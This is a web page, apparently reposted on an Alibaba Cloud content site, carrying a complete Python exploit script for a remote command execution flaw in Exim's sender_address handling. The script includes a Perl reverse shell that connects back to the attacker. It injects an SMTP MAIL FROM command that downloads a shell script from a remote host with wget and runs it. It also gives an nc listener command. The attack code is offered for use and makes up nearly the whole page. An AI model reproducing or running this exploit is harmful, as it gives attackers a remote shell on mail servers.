Exim sender_address Remote Command Execution

Source: Internet
Author: User
#!/usr/bin/env python ####################################################################################      Exim sender_address Parameter - Remote Command Execution Exploit        ######################################################################################                                                                              #### Vulnerability found by RedTeam Pentesting GmbH                               #### https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/              ####                                                                              #### Exploit written by eKKiM                                                     #### http://rdtx.eu/exim-with-dovecot-lda-rce-exploit/                            ####                                                                              ######################################################################################                                    USAGE                                     ######################################################################################                                                                              #### Edit the PERL REVERSE SHELL MY_CONNECTBACK_IP and MY_CONNECTBACK_PORT and   #### upload this perl reverse shell script to a webserver.                        ####                                                                              #### Edit the PERL_SHELL variable to your own connectback script URL              ####                                                                              #### Start a listener: nc -vvn -l -p CONNECT_BACK_PORT                            ####                                                                              #### Let the exploitin begin                                                      ####                                                                              ####################################################################################  ####### PERL REVERSE SHELL ######### use Socket;$i="MY_CONNECTBACK_IP";$p=MY_CONNECTBACK_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};####### PERL REVERSE SHELL #######  import socketimport sys ####### URL TO YOUR CONNECTBACK SHELL #######PERL_SHELL = "myhost.com/shell.pl"####### URL TO YOUR CONNECTBACK SHELL ####### if len(sys.argv) != 2:    print "Usage: exim_exploit.py <target_ip> <optional_rcpt_address>"    print " <target_ip> target you want to test"    print " <optional_rcpt_address> an address which is accepted by exim (default: postmaster@localhost)"    exit(1) RCPT_TO = "postmaster@localhost"HOST = sys.argv[1]PORT = 25 def read_line(s):    ret = ''     while True:        c = s.recv(1)         if c == '\n' or c == '':            break        else:            ret += c     return ret  if len(sys.argv) == 3:    RCPT_TO = sys.argv[2]     print "Exim sender_address Parameter - Remote Command Execution Exploit"print "Bug discovered by RedTeam Pentesting GmbH"print "Exploit created by eKKiM"print "" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((HOST, PORT)) data = read_line(s);if not(data.startswith("220")):    print "[ERROR] Is it SMTP Server?"    exit(1)     s.send("EHLO domain.local\n")s.recv(4096) s.send("MAIL FROM: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}" + PERL_SHELL + "``perl${IFS}/tmp/p.pl`@blaat.com\n") data = read_line(s);if not(data.startswith("250")):    print "[ERROR] MAIL FROM not accepted"    exit(1) s.send("RCPT TO: " + RCPT_TO + "\n")data = read_line(s);if not(data.startswith("250")):    print "[ERROR] RCPT_TO not accepted"    exit(1) s.send("DATA\n")data = read_line(s);if not(data.startswith("354")):    print "[ERROR] Cannot send email content"    exit(1)     s.send("x\n.\n")data = read_line(s);if not(data.startswith("250")):    print "[ERROR] email content revoked"    exit(1)     print "[OK] Recieved shell?" s.close()

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.